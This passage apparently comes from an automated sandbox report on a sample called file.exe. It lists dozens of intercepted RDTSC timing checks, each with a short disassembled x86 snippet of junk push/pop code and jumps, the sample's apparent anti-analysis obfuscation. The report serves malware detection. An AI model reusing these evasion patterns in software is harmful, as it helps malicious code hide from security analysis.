                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A414 second address: 57A41F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E1E0 second address: 57E1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E4F0 second address: 57E50B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E50B second address: 57E515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB438CB0BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E515 second address: 57E523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580AB9 second address: 580ACB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807AE second address: 5807BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807BF second address: 5807CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007FB438CB0BF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5807CF second address: 5807EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BAD second address: 583BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BB1 second address: 583BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583BBB second address: 583C0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438CB0BF6h 0x00000008 jmp 00007FB438CB0BFFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007FB438CB0BF6h 0x00000016 pop esi 0x00000017 push ecx 0x00000018 jp 00007FB438CB0BF6h 0x0000001e jmp 00007FB438CB0C02h 0x00000023 pop ecx 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB438CB0C01h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583C0A second address: 583C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583C10 second address: 583C39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB438CB0BF6h 0x00000008 jmp 00007FB438CB0C07h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FB438CB0BF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5858AD second address: 5858B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58940D second address: 58941C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 jbe 00007FB438CB0BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58958C second address: 5895A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F731h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895A7 second address: 5895AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895AD second address: 5895B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895B2 second address: 5895D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB438CB0C07h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5895D5 second address: 5895FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438C6F738h 0x00000008 jmp 00007FB438C6F72Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 589BA6 second address: 589BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58F35C second address: 58F360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E24F second address: 58E255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E39A second address: 58E39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E39E second address: 58E3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E3AA second address: 58E3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E3AE second address: 58E3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532E45 second address: 532E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532E4A second address: 532E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C07h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532E65 second address: 532F06 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FB438C6F728h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 call 00007FB438C6F737h 0x0000002c sub dword ptr [ebp+122D2875h], ecx 0x00000032 pop edi 0x00000033 xor dword ptr [ebp+122D2812h], ebx 0x00000039 mov ebx, dword ptr [ebp+12483F6Ah] 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007FB438C6F728h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 add eax, ebx 0x0000005b mov dx, D159h 0x0000005f nop 0x00000060 pushad 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 jmp 00007FB438C6F732h 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c js 00007FB438C6F726h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532F06 second address: 532F3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007FB438CB0C07h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 mov cl, bl 0x0000001a push 00000004h 0x0000001c movsx ecx, si 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop eax 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532F3E second address: 532F49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB438C6F726h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 532F49 second address: 532F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a je 00007FB438CB0BF6h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FB438CB0BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58E6B1 second address: 58E6B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 595F43 second address: 595F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB438CB0BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59408D second address: 594092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594092 second address: 5940B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0BFEh 0x00000009 jp 00007FB438CB0BF6h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5948AA second address: 5948B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5948B4 second address: 5948BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FB438CB0BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5948BF second address: 5948C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5956A9 second address: 5956AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5959A5 second address: 5959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB438C6F732h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5959BE second address: 5959D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB438CB0BFBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DF0D second address: 59DF27 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB438C6F726h 0x00000008 jnp 00007FB438C6F726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB438C6F72Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DF27 second address: 59DF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DF2D second address: 59DF31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DF31 second address: 59DF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59DF37 second address: 59DF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FB438C6F726h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E490 second address: 59E496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E5CF second address: 59E5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E752 second address: 59E76A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E76A second address: 59E770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E770 second address: 59E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E8B6 second address: 59E8CA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C6F726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007FB438C6F72Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4FAC second address: 5A4FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4FB2 second address: 5A4FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5139 second address: 5A513F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5570 second address: 5A5574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5574 second address: 5A557A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A557A second address: 5A5592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F733h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5B08 second address: 5A5B12 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB438CB0BFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6547 second address: 5A6554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FB438C6F726h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4A86 second address: 5A4AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB438CB0BF6h 0x0000000a jmp 00007FB438CB0C05h 0x0000000f popad 0x00000010 push ebx 0x00000011 jmp 00007FB438CB0C08h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4AC0 second address: 5A4AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F730h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD2B9 second address: 5AD2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AD2BF second address: 5AD2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB665 second address: 4EB669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC007 second address: 5BC01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB438C6F72Fh 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC01F second address: 5BC024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC024 second address: 5BC02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BC161 second address: 5BC183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB438CB0C02h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF608 second address: 5BF60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C11B5 second address: 5C11C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007FB438CB0BF6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C11C3 second address: 5C11EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB438C6F738h 0x0000000b popad 0x0000000c push eax 0x0000000d ja 00007FB438C6F728h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C85AE second address: 5C85B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4A44 second address: 5D4A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB438C6F736h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4A6B second address: 5D4A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4A6F second address: 5D4A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6228 second address: 5D622E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC6B8 second address: 5DC6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007FB438C6F744h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC6E1 second address: 5DC6FC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB438CB0BF8h 0x00000008 jmp 00007FB438CB0BFAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC6FC second address: 5DC702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC702 second address: 5DC71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0C08h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC71F second address: 5DC731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F72Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC731 second address: 5DC735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC88F second address: 5DC895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC895 second address: 5DC899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCA14 second address: 5DCA1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCB63 second address: 5DCB89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FB438CB0BF6h 0x0000000f jmp 00007FB438CB0C02h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCB89 second address: 5DCB99 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCD00 second address: 5DCD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 jmp 00007FB438CB0BFAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCE97 second address: 5DCEBB instructions: 0x00000000 rdtsc 0x00000002 je 00007FB438C6F726h 0x00000008 jmp 00007FB438C6F72Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FB438C6F72Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD02C second address: 5DD034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD034 second address: 5DD038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD17D second address: 5DD181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD181 second address: 5DD18B instructions: 0x00000000 rdtsc 0x00000002 js 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD18B second address: 5DD1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C05h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2B5B second address: 5E2B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2747 second address: 5E274C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
